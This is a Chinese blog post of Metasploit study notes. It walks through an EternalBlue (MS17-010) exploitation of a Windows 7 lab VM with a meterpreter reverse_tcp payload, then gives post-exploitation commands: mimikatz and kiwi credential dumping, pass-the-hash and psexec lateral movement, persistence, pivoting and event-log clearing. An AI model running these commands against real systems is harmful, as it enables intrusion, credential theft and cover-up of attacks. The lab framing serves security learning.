Skip to content
Kurisu
Go back

Metasploit 渗透框架

Metasploit 上手笔记:模块体系怎么记、我用 ms17-010 完整打通过一台靶机、Meterpreter 会话管理和 msfvenom 生成木马的具体命令。

核心知识点

1. 漏洞与漏洞编号

2. 永恒之蓝(MS17-010)产生原因

3. MSF 简介与模块

auxiliary 模块(不建立访问,只扫描/探/指纹识别):

exploits 漏洞利用模块

post 后渗透模块

4. Exploit 参数

5. Payload 命名规则

<操作系统>/<架构>/<功能类型>/<连接方式>

为什么 reverse_tcp + meterpreter 是黄金搭档:反向连接让主动连攻击绕过防火墙;Meterpreter 活在不写硬盘难被查杀,自带密码抓取/键盘记录/截屏,支持动态加载扩展。

6. 永恒之蓝完整复现

环境准备:VMware 中 Kali(攻击机)+ Windows 7(靶机),同一网络(NAT/桥接)。 靶机准备:防火墙、杀毒软件、卸载 MS17-010 补丁(KB4012212 等)。

# 信息收集:扫描 445 端口
nmap -p 445 <靶机IP>

# 启动 MSF
msfconsole

# 搜索模块
search ms17-010

# 扫描验证漏洞
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS <靶机IP>
run
# 输出:Host is likely VULNERABLE to MS17-010!

# 利用模块
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOSTS <靶机IP>
set LHOST <攻击机IP>
check          # 可选,非攻击性检测
exploit
# 成功:Meterpreter session 1 opened

7. Meterpreter 后渗透操作

基础命令

getuid          # 查看当前权限(通常 SYSTEM)
sysinfo         # 查看系统信息
screenshot      # 截屏
shell           #  CMD 命令行
clearev         # 事件日志

信息收集类 Post 模块

run post/windows/gather/checkvm             # 是否虚拟机
run post/windows/gather/enum_applications   # 枚举已软件
run post/windows/gather/winenum             # 网络/用户列表/剪贴板等
run post/windows/manage/keylog_recorder     # 键盘记录(keylog_dump 查看)

权限提升与凭证窃取

run post/multi/recon/local_exploit_suggester   # 推荐提权 Exploit
run post/windows/gather/smart_hashdump         # 导出所有用户哈希(需 SYSTEM)
load kiwi                                      # 加载 Mimikatz 扩展
creds_all                                      # 抓取明文密码(Wdigest 开启时)

Mimikatz 独立使用(MSF 提权失败时):

# 上传 mimikatz
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe C:\\Users\\Public\\
# 执行
shell
cd C:\Users\Public
mimikatz.exe
privilege::debug               # 提升自身权限(Privilege '20' OK)
sekurlsa::logonpasswords       # 转储 LSASS 进程凭证(核心)

使用抓取到的凭证横向移动

# 哈希传递 pth
load kiwi
pth USERNAME=Admin NTLM=<NTLM哈>

# psexec 模块横向移动
background
use exploit/windows/smb/psexec
set RHOSTS <目标域控IP>
set SMBUser Administrator
set SMBPass <NTLM哈>
run

注意privilege::debug 需已是管理员组成员;mimikatz.exe 易被杀软删除,推荐用 MSF kiwi(执行不落盘)。

run post/windows/manage/persistence_exe      # 注册为服务开机自启
run post/windows/manage/registry_persistence # 注册表 Run 键

网穿透与横向移动

run post/multi/manage/autoroute               # 添加路由,让 MSF 通过会话转发到网
run post/multi/manage/socks_proxy             # 目标变代理服务器, Proxychains
portfwd add -l 1234 -p 3389 -r 目标IP         # 端口转发(绕过防火墙连远程桌面)

痕迹

run post/windows/manage/clear_event_log       # 空系统//应用日志

Post 模块标准操作流程

getuid → sysinfo → enum_applications → smart_hashdump → migrate(迁移到 explorer.exe/svchost.exe 防止掉线)→ persistence_exe

查找 Post 模块search type:postsearch post windows gather

8. Docker 容器解决环境

实操步骤

msfconsole
search ms17-010
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.105
run
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOSTS 192.168.1.105
set LHOST 192.168.1.100
exploit

# 后渗透
getuid
sysinfo
screenshot
run post/windows/gather/smart_hashdump
load kiwi
creds_all
run post/multi/manage/autoroute
clearev

常见错误与排查


Share this post:

Previous Post
暴力破解与弱口令
Next Post
Cobalt Strike 后渗透